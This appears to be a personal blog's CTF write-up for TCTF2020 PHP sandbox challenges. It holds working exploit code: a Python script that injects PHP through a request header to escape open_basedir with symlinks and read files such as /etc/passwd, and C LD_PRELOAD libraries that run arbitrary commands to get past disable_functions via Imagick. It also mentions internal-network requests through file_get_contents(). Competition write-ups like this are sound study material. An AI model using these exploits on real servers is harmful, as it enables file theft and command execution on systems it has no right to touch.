      Eki
      2021-05-06
      CTF Contest
      # TCTF2020

      # Cloud Computing

Bypassing open_basedir with symlinks

The sandbox runs our PHP with open_basedir pinned to a per-user directory, `/var/www/html/sandbox/<id>/` (`{4}` in the script below). The classic symlink trick gets around it:

1. Create a directory seven levels deep inside the sandbox (`{0}/b/c/d/e/f/g`) and a symlink `{1}` pointing at it.
2. Re-set open_basedir to `{4}:{4}{2}/`. Both entries lie inside the current restriction, so PHP accepts the runtime change (open_basedir may only be narrowed at runtime), and the list now contains the path of the link created next.
3. Create the symlink `{2}` -> `{4}{1}/../../../../../../`. While `{1}` still resolves to the deep directory, the six `..` only climb back to `{4}{0}`, so the target is inside open_basedir and the symlink() call is allowed.
4. Delete `{1}`. Taken literally, the target of `{2}` is now `{4}{1}/../../../../../../`, and six `..` from a directory five levels deep (`/var/www/html/sandbox/<id>`) lead to `/`.
5. Read `{4}{2}{3}`: the path is accepted against the `{4}{2}/` entry added in step 2, although the link now leads to `/{3}`, e.g. `/flag`.

Payload: the PHP is delivered in the `eki` request header to the sandbox endpoint (`url1`), which executes it and returns the base64 of the file; the script decodes it to a local file.

import base64
import random
import string

import requests

# Challenge endpoint that executes the PHP passed in the "eki" header
# (the actual URL is not recorded on this page)
url1 = "http://<sandbox-host>/"
SANDBOX = "/var/www/html/sandbox/f700deb7a6e26f106e3103e6257bb68a75a1a5f3/"


def randomstr(n=8):
    """Random directory/link name so repeated runs do not collide."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(n))


def exploit(f):
    """Read the absolute path f (e.g. "/flag") through the sandbox."""
    print(f)
    payload = """
error_reporting(E_ALL);
mkdir('{4}{0}/b/c/d/e/f/g/',0777,TRUE);symlink('{4}{0}/b/c/d/e/f/g','{4}{1}');
ini_set('open_basedir','{4}:{4}{2}/');
symlink('{4}{1}/../../../../../../','{4}{2}');
unlink('{4}{1}');
echo base64_encode(file_get_contents('{4}{2}{3}'));
""".format(randomstr(), randomstr(), randomstr(), f, SANDBOX)
    poc = payload.replace("\n", "")  # one line, so it fits in a header value
    headers = {"eki": poc}
    req = requests.get(url1, headers=headers)
    print(req.text)
    # A missing/unreadable file produces a PHP warning instead of base64
    if "failed to open stream" not in req.text:
        try:
            # e.g. /etc/passwd is saved as ./etcpasswd1
            with open(f.replace("/", "") + "1", "wb") as retf:
                retf.write(base64.b64decode(req.text))
        except Exception:
            print("error")
      

      # Cloud Computing V2

Here /flag is blocked; I did not expect an intranet pentest to be required....

file_get_contents() accepts http:// URLs, so the same PHP primitive can be used to make requests to hosts on the internal network.

      # Wallbreak Easy

> Imagick is an awesome library for hackers to break `disable_functions`.
> So I installed php-imagick in the server, opened a `backdoor` for you.
> Let's try to execute `/readflag` to get the flag.
      

The challenge asks for a disable_functions bypass and name-drops php-imagick, so the intended route is to use that extension: have Imagick spawn an external helper process with LD_PRELOAD pointing at a shared object we control, so that our code runs inside the helper. The library:

#include <stdio.h>
#include <stdlib.h>

/* Run the command taken from the CMD environment variable */
void payload() {
    const char* cmd = getenv("CMD");   /* was getenv('CMD'): a char constant, not a string */
    system(cmd);
}

/* Override fflush(), a libc function the spawned helper is expected to call.
   Fires once, dropping LD_PRELOAD first so the shell started by system()
   does not load this .so again and recurse. */
int fflush(FILE *stream) {
    (void)stream;
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
    return 0;
}
      

Build the .so file

      gcc -fPIC -shared hack1.c -o hack1.so
      
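As an added example (not the challenge's hack1.c), here is the constructor form of the same LD_PRELOAD library: an ELF constructor runs as soon as the loader maps the .so, so it does not depend on the helper ever calling fflush(). It also covers the practical detail the snippet above leaves out: the helper's stdout is not what the PHP script sees, so the command's output should be redirected into a file PHP can read afterwards. The environment variable names CMD and CMD_OUT are this example's own choice.

```c
/* Added example: LD_PRELOAD payload using an ELF constructor.
 * Build: gcc -fPIC -shared preload_cmd.c -o preload_cmd.so
 * Environment expected in the helper process (names chosen for this example):
 *   CMD      command to run
 *   CMD_OUT  optional file that receives the command's stdout and stderr */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>

/* Wrap cmd so its stdout and stderr go to outfile. Returns the length of the
 * wrapped command, or -1 if it does not fit in buf. */
int build_redirected_command(const char *cmd, const char *outfile,
                             char *buf, size_t buflen) {
    int n = snprintf(buf, buflen, "(%s) >%s 2>&1", cmd, outfile);
    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}

/* Fire once per process: only when CMD is set and LD_PRELOAD is still in the
 * environment. LD_PRELOAD is removed before system() so the /bin/sh it forks
 * does not map this library again and re-enter here.
 * Returns system()'s status, 0 when nothing was run, -1 on error. */
int run_payload(void) {
    const char *cmd = getenv("CMD");
    if (cmd == NULL || getenv("LD_PRELOAD") == NULL) return 0;
    unsetenv("LD_PRELOAD");

    char wrapped[4096];
    const char *outfile = getenv("CMD_OUT");
    if (outfile != NULL) {
        if (build_redirected_command(cmd, outfile, wrapped, sizeof wrapped) < 0)
            return -1;
        cmd = wrapped;
    }
    return system(cmd);
}

/* Runs when the dynamic loader maps the .so, before the helper's own main() */
__attribute__((constructor)) static void on_load(void) {
    run_payload();
}
```

From PHP the flow is the same as with the fflush() hook: set `LD_PRELOAD` to the .so, `CMD` to the command and `CMD_OUT` to a file inside the web root, trigger the Imagick helper, then read the file back.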

# References

TCTF2019 WallBreaker-Easy solution analysis: https://xz.aliyun.com/t/4688#toc-5

Last updated: 2022/05/18, 16:49:51
Copyright © 2019-2022 EkiXu. This work is licensed under a Creative Commons Attribution 4.0 International License.